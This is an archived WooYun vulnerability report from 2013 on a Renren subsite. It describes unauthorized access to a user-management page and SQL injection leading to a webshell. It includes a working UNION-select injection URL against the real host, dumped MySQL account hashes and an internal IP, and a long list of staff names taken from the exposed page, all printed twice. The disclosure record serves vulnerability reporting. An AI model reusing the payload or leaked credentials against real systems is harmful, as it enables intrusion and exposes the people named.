当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-022040

漏洞标题:人人网某分站越权获得WEBSHELL.

相关厂商:人人网

漏洞作者: 工作专用

提交时间:2013-04-17 21:47

修复时间:2013-06-01 21:48

公开时间:2013-06-01 21:48

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-04-17: 细节已通知厂商并且等待厂商处理中
2013-04-18: 厂商已经确认,细节仅向厂商公开
2013-04-28: 细节向核心白帽子及相关领域专家公开
2013-05-08: 细节向普通白帽子公开
2013-05-18: 细节向实习白帽子公开
2013-06-01: 细节向公众公开

简要描述:

人人网某分站获得WEBSHELL.

详细说明:

越权访问
http://opm.yx.renren.com/user_manage.php
直接查看所有账号密码
越权访问
http://opm.yx.renren.com/user_manage.php
直接查看所有账号密码
朱慧佳 5 1 修改 删除
张元 3 1 修改 删除
高泰阳 0 1 修改 删除
艾佳佳 3 1 修改 删除
党兰 5 1 修改 删除
赵子墨 2 1 修改 删除
刘思 0 1 修改 删除
黄宗豪 0 1 修改 删除
蒲维丰 0 1 修改 删除
张淑婵 0 1 修改 删除
刘伟 0 1 修改 删除
李潇楠 0 1 修改 删除
张鹏 0 1 修改 删除
潘敏 0 1 修改 删除
李正新 0 1 修改 删除
徐倩雅 0 1 修改 删除
李世凡 5 1 修改 删除
林庆霖 0 1 修改 删除
徐莎莎 0 1 修改 删除
白玮 0 1 修改 删除
贺学威 0 1 修改 删除
严翠萍 0 1 修改 删除
张瑜 0 1 修改 删除
夏雷 0 1 修改 删除
徐冰 0 1 修改 删除
肖静 0 1 修改 删除
徐倩雅 0 1 修改 删除
赵蕾 5 1 修改 删除
陈贝 5 1 修改 删除
陈怡雯 0 1 修改 删除
朱倩 0 1 修改 删除
汪耀 0 1 修改 删除
李洋 0 1 修改 删除
董健敏 0 1 修改 删除
王旭 0 1 修改 删除
阮明沙 0 1 修改 删除
赵晶 0 1 修改 删除
许韬 0 1 修改 删除
吕大琳 0 1 修改 删除
陈高铭 0 1 修改 删除
林未乔 3 1 修改 删除
余冬 3 1 修改 删除
吕大琳 0 1 修改 删除
邹潇 3 1 修改 删除
林秋丽 0 1 修改 删除
居巍 0 1 修改 删除
陈天悦 5 1 修改 删除
赵蕾 3 1 修改 删除
张硕 3 1 修改 删除
刘巍 1 1 修改 删除
曹淼 1 1 修改 删除
胡永雄 4 1 修改 删除
吴小兰 4 1 修改 删除
无 5 1 修改 删除
马威 5 1 修改 删除
李珊 0 1 修改 删除
吕永鑫 2 1 修改 删除
周艳 2 1 修改 删除
郝小乔 0 1 修改 删除
王莉玲 0 1 修改 删除
董舒 2 1 修改 删除
王娟 0 1 修改 删除
夏丹寅 5 1 修改 删除
蒲维丰 5 1 修改 删除
张言数 3 1 修改 删除
胡永雄 3 1 修改 删除
冯钰璐 3 1 修改 删除
吴小兰 3 1 修改 删除
钟睿 2 1 修改 删除
内部 5 1 修改 删除
吴毅平 3 1 修改 删除
直签 5 1 修改 删除
关羽洁 0 1 修改 删除
郭嘉 5 1 修改 删除
李伟杰 5 1 修改 删除
翟军妮 5 1 修改 删除
窦萍 5 1 修改 删除
李正新 3 1 修改 删除
王沛然 5 1 修改 删除
朱晓倩 5 1 修改 删除
杨柯 5 1 修改 删除
舒超 5 1 修改 删除
何林 5 1 修改 删除
刘婷 5 1 修改 删除
周霞 5 1 修改 删除
张笑 5 1 修改 删除
董磊 5 1 修改 删除
金宁 5 1 修改 删除
张娜 5 1 修改 删除
董曼曼 5 1 修改 删除
胡晓平 5 1 修改 删除
康丹丹 5 1 修改 删除
谭琳 5 1 修改 删除
童舒心 5 1 修改 删除
杨洋 5 1 修改 删除
于涛 5 1 修改 删除
崔欣 5 1 修改 删除
田苓力 5 1 修改 删除
于光昊 5 1 修改 删除
刘雁翔 5 1 修改 删除
李蕾 5 1 修改 删除
吴宜轩 5 1 修改 删除
宋英洁 5 1 修改 删除
刘应荣 5 1 修改 删除
杨静 5 1 修改 删除
刘洁茵 5 1 修改 删除
谷维 5 1 修改 删除
陈皓 5 1 修改 删除
刘欢 3 1 修改 删除
惠珉璟 3 1 修改 删除
郭嵩 4 1 修改 删除
陈佳青 4 1 修改 删除
汪艳艳 4 1 修改 删除
李雁南 0 1 修改 删除
张扬 4 1 修改 删除
郑孟凡 4 1 修改 删除
泥惠芳 4 1 修改 删除
冯姝瑶 4 1 修改 删除
马春成 4 1 修改 删除
刘杨 4 1 修改 删除
伊楠 3 1 修改 删除
张佳梁 3 1 修改 删除
管丁 1 1 修改 删除
王梁 2 1 修改 删除
成倩 3 1 修改 删除
唐培蕾 3 1 修改 删除
冯海涛 2 1 修改 删除
刘昭 3 1 修改 删除
韩羽凌 2 1 修改 删除
王彬 3 1 修改 删除
方博 3 1 修改 删除
江伍龙 2 1 修改 删除
郁晓敏 3 1 修改 删除
李文赫 3 1 修改 删除
隋军 0 1 修改 删除
张继伟 3 1 修改 删除
李剑 3 1 修改 删除
闫闶 3 1 修改 删除
严秀娟 3 1 修改 删除
张莲庆 3 1 修改 删除
张东禹 1 1 修改 删除
马克菲 3 1 修改 删除
李凯荣 3 1 修改 删除
杨宋 0 1 修改 删除
于正 2 1 修改 删除
涂刚 2 1 修改 删除
马箐璟 2 1 修改 删除
甘露 3 1 修改 删除
宋琛瑶 2 1 修改 删除
杨阳 2 1 修改 删除
简沂蓁 0 1 修改 删除

1.jpg

2.jpg

3.jpg


http://opm.yx.renren.com/project_info.php?id=447 直接注射
http://opm.yx.renren.com/project_info.php?id=447%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,database(),8,9,0,1,2,3,4,5,6/*xx
Root
root::localhost
apps:*9AE87FC7EEE73219D93943706714B9A69B0B300B:%::localhost
yake:*9AE87FC7EEE73219D93943706714B9A69B0B300B:10.2.%
yake:*9AE87FC7EEE73219D93943706714B9A69B0B300B:%
ispconfig:73d465767e39eb77:localhost
suijun:19012f603a01ad5e:%
violin:71a4653336b50cfd:%
yake@211.100.39.191
随便翻翻库
http://opm.yx.renren.com/ct/

4.jpg

5.jpg

6.jpg


1 catest ******* catest j*********@renren-inc.com 2011-05-26 09:13:44 0 **********

7.jpg


先看能否拽个WEBSHELL

8.jpg


9.jpg


/etc/lighttpd/lighttpd.conf

1111.jpg


时间关系不继续深入下去.

漏洞证明:

越权访问
http://opm.yx.renren.com/user_manage.php
直接查看所有账号密码
越权访问
http://opm.yx.renren.com/user_manage.php
直接查看所有账号密码
朱慧佳 5 1 修改 删除
张元 3 1 修改 删除
高泰阳 0 1 修改 删除
艾佳佳 3 1 修改 删除
党兰 5 1 修改 删除
赵子墨 2 1 修改 删除
刘思 0 1 修改 删除
黄宗豪 0 1 修改 删除
蒲维丰 0 1 修改 删除
张淑婵 0 1 修改 删除
刘伟 0 1 修改 删除
李潇楠 0 1 修改 删除
张鹏 0 1 修改 删除
潘敏 0 1 修改 删除
李正新 0 1 修改 删除
徐倩雅 0 1 修改 删除
李世凡 5 1 修改 删除
林庆霖 0 1 修改 删除
徐莎莎 0 1 修改 删除
白玮 0 1 修改 删除
贺学威 0 1 修改 删除
严翠萍 0 1 修改 删除
张瑜 0 1 修改 删除
夏雷 0 1 修改 删除
徐冰 0 1 修改 删除
肖静 0 1 修改 删除
徐倩雅 0 1 修改 删除
赵蕾 5 1 修改 删除
陈贝 5 1 修改 删除
陈怡雯 0 1 修改 删除
朱倩 0 1 修改 删除
汪耀 0 1 修改 删除
李洋 0 1 修改 删除
董健敏 0 1 修改 删除
王旭 0 1 修改 删除
阮明沙 0 1 修改 删除
赵晶 0 1 修改 删除
许韬 0 1 修改 删除
吕大琳 0 1 修改 删除
陈高铭 0 1 修改 删除
林未乔 3 1 修改 删除
余冬 3 1 修改 删除
吕大琳 0 1 修改 删除
邹潇 3 1 修改 删除
林秋丽 0 1 修改 删除
居巍 0 1 修改 删除
陈天悦 5 1 修改 删除
赵蕾 3 1 修改 删除
张硕 3 1 修改 删除
刘巍 1 1 修改 删除
曹淼 1 1 修改 删除
胡永雄 4 1 修改 删除
吴小兰 4 1 修改 删除
无 5 1 修改 删除
马威 5 1 修改 删除
李珊 0 1 修改 删除
吕永鑫 2 1 修改 删除
周艳 2 1 修改 删除
郝小乔 0 1 修改 删除
王莉玲 0 1 修改 删除
董舒 2 1 修改 删除
王娟 0 1 修改 删除
夏丹寅 5 1 修改 删除
蒲维丰 5 1 修改 删除
张言数 3 1 修改 删除
胡永雄 3 1 修改 删除
冯钰璐 3 1 修改 删除
吴小兰 3 1 修改 删除
钟睿 2 1 修改 删除
内部 5 1 修改 删除
吴毅平 3 1 修改 删除
直签 5 1 修改 删除
关羽洁 0 1 修改 删除
郭嘉 5 1 修改 删除
李伟杰 5 1 修改 删除
翟军妮 5 1 修改 删除
窦萍 5 1 修改 删除
李正新 3 1 修改 删除
王沛然 5 1 修改 删除
朱晓倩 5 1 修改 删除
杨柯 5 1 修改 删除
舒超 5 1 修改 删除
何林 5 1 修改 删除
刘婷 5 1 修改 删除
周霞 5 1 修改 删除
张笑 5 1 修改 删除
董磊 5 1 修改 删除
金宁 5 1 修改 删除
张娜 5 1 修改 删除
董曼曼 5 1 修改 删除
胡晓平 5 1 修改 删除
康丹丹 5 1 修改 删除
谭琳 5 1 修改 删除
童舒心 5 1 修改 删除
杨洋 5 1 修改 删除
于涛 5 1 修改 删除
崔欣 5 1 修改 删除
田苓力 5 1 修改 删除
于光昊 5 1 修改 删除
刘雁翔 5 1 修改 删除
李蕾 5 1 修改 删除
吴宜轩 5 1 修改 删除
宋英洁 5 1 修改 删除
刘应荣 5 1 修改 删除
杨静 5 1 修改 删除
刘洁茵 5 1 修改 删除
谷维 5 1 修改 删除
陈皓 5 1 修改 删除
刘欢 3 1 修改 删除
惠珉璟 3 1 修改 删除
郭嵩 4 1 修改 删除
陈佳青 4 1 修改 删除
汪艳艳 4 1 修改 删除
李雁南 0 1 修改 删除
张扬 4 1 修改 删除
郑孟凡 4 1 修改 删除
泥惠芳 4 1 修改 删除
冯姝瑶 4 1 修改 删除
马春成 4 1 修改 删除
刘杨 4 1 修改 删除
伊楠 3 1 修改 删除
张佳梁 3 1 修改 删除
管丁 1 1 修改 删除
王梁 2 1 修改 删除
成倩 3 1 修改 删除
唐培蕾 3 1 修改 删除
冯海涛 2 1 修改 删除
刘昭 3 1 修改 删除
韩羽凌 2 1 修改 删除
王彬 3 1 修改 删除
方博 3 1 修改 删除
江伍龙 2 1 修改 删除
郁晓敏 3 1 修改 删除
李文赫 3 1 修改 删除
隋军 0 1 修改 删除
张继伟 3 1 修改 删除
李剑 3 1 修改 删除
闫闶 3 1 修改 删除
严秀娟 3 1 修改 删除
张莲庆 3 1 修改 删除
张东禹 1 1 修改 删除
马克菲 3 1 修改 删除
李凯荣 3 1 修改 删除
杨宋 0 1 修改 删除
于正 2 1 修改 删除
涂刚 2 1 修改 删除
马箐璟 2 1 修改 删除
甘露 3 1 修改 删除
宋琛瑶 2 1 修改 删除
杨阳 2 1 修改 删除
简沂蓁 0 1 修改 删除

1.jpg

2.jpg

3.jpg


http://opm.yx.renren.com/project_info.php?id=447 直接注射
http://opm.yx.renren.com/project_info.php?id=447%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,database(),8,9,0,1,2,3,4,5,6/*xx
Root
root::localhost
apps:*9AE87FC7EEE73219D93943706714B9A69B0B300B:%::localhost
yake:*9AE87FC7EEE73219D93943706714B9A69B0B300B:10.2.%
yake:*9AE87FC7EEE73219D93943706714B9A69B0B300B:%
ispconfig:73d465767e39eb77:localhost
suijun:19012f603a01ad5e:%
violin:71a4653336b50cfd:%
yake@211.100.39.191
随便翻翻库
http://opm.yx.renren.com/ct/

4.jpg

5.jpg

6.jpg


1 catest ******* catest j*********@renren-inc.com 2011-05-26 09:13:44 0 **********

7.jpg


先看能否拽个WEBSHELL

8.jpg


9.jpg


/etc/lighttpd/lighttpd.conf

1111.jpg


时间关系不继续深入下去.

修复方案:

多方面原因。

版权声明:转载请注明来源 工作专用@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2013-04-18 10:53

厂商回复:

Thanks!

最新状态:

暂无